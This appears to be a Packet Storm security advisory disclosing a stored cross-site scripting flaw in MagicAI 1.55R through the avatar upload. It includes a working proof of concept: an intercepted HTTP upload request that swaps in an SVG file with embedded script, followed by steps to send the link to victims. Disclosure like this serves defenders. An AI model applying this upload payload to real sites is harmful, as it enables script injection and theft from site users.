MagicAI version 1.55R suffers from a persistent cross site scripting vulnerability via a file upload.
f4d106d7a59e4b426baf267d2bfbc5e19be78391b0f2498637e74b343fb4f208┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://magicai.liquid-themes.com/ │
│ Vendor : MagicAI │
│ Software : MagicAI 1.55R │
│ Vuln Type: Stored XSS via File Upload │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │
│ information, manipulate data, and launch additional attacks. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
## Steps to Reproduce:
1. Go to [Settings] on this Path (https://website/dashboard/user/settings)
2. Upload any Image in Avatar to capture the request in Burp Suite
3. Replace image.png with image.svg in [filename] and add this SVG with HTML Included
----------------------------------------------------------------------------------------
POST /dashboard/user/settings/save HTTP/2
Content-Disposition: form-data; name="avatar"; filename="image.svg"
Content-Type: image/png
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
----------------------------------------------------------------------------------------
4. Send the Request
5. Back to the Path (https://website/dashboard/user/settings)
6. Refresh the Page
7. Capture the Link of your Uploaded svg in [Burp Logger] GET (https://website/upload/images/avatar/****-culote-mia-avatar.svg)
8. Send SVG Link to Victims
9. XSS Executed!
[-] Done
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed